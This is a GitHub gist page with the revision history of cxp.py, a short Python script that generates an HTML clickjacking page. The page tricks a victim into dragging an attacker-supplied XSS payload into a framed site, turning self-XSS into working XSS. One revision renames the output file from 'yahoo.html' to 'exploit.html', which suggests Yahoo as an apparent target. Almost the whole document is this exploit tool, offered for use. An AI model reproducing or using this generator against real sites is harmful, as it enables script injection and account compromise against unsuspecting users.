Skip to content

Instantly share code, notes, and snippets.

@flying0er

flying0er/cxp.py

Forked from vishwaraj101/cxp.py
Created November 22, 2017 14:02
Show Gist options

  • Select an option

    Learn more about clone URLs
  • Save flying0er/abc51c25c1a50b0a013aa329352ca22d to your computer and use it in GitHub Desktop.

Select an option

Learn more about clone URLs
Save flying0er/abc51c25c1a50b0a013aa329352ca22d to your computer and use it in GitHub Desktop.
Download ZIP

Revisions

  1. @vishwaraj101 vishwaraj101 revised this gist Apr 13, 2016. No changes.
  2. @vishwaraj101 vishwaraj101 revised this gist Apr 13, 2016. No changes.
  3. @vishwaraj101 vishwaraj101 revised this gist Apr 12, 2016. 1 changed file with 2 additions and 2 deletions.
    4 changes: 2 additions & 2 deletions cxp.py
    View file
    Original file line number Diff line number Diff line change
    @@ -2,15 +2,15 @@
    vector=raw_input('xss vector--> ') #xss payload
    html=raw_input('Custom Iframe Code--> ') #custom iframe code

    fo=open('yahoo.html','w') #creating html file
    fo=open('exploit.html','w') #creating html file

    source_code="""<html><body>
    <h1>Clickjack to exploit self xss </h1>
    <div draggable="true" ondragstart="event.dataTransfer.setData('text/plain', '%s')"><h3>DRAG ME!!</h3></div>
    """%(vector)

    fo.write(source_code)
    fo=open('yahoo.html','a')
    fo=open('exploit.html','a')
    fo.write(html)
    fo.write('</body></html>')
    fo.close() #closing the file
  4. @vishwaraj101 vishwaraj101 created this gist Apr 12, 2016.
    17 changes: 17 additions & 0 deletions cxp.py
    View file
    Original file line number Diff line number Diff line change
    @@ -0,0 +1,17 @@
    print "Clickjack to Xss"
    vector=raw_input('xss vector--> ') #xss payload
    html=raw_input('Custom Iframe Code--> ') #custom iframe code

    fo=open('yahoo.html','w') #creating html file

    source_code="""<html><body>
    <h1>Clickjack to exploit self xss </h1>
    <div draggable="true" ondragstart="event.dataTransfer.setData('text/plain', '%s')"><h3>DRAG ME!!</h3></div>
    """%(vector)

    fo.write(source_code)
    fo=open('yahoo.html','a')
    fo.write(html)
    fo.write('</body></html>')
    fo.close() #closing the file
    print "file created"